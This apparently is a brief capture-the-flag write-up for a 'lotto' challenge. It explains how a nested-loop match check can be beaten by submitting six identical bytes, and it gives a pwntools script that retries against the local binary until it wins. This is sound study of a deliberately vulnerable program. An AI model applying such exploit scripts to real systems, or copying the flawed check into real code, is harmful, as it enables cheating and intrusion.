Here, we have lotto program, however, while checking if our input is a match, it uses the following piece of code:
int match = 0, j = 0;
for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}Basically, it intends to check whether the numbers are a match regardless of the order. But here, if we provide an array of all ones, then if there is a one in the random array, then we get a pass.
from pwn import *
p = process("./lotto")
while True:
p.recvuntil("-")
p.clean()
p.sendline("1")
p.recvuntil("bytes :")
p.sendline("\x01\x01\x01\x01\x01\x01")
p.recvuntil("Start!\n")
s = p.recvline()
if s != b'bad luck...\n':
print(s)
break
p.close()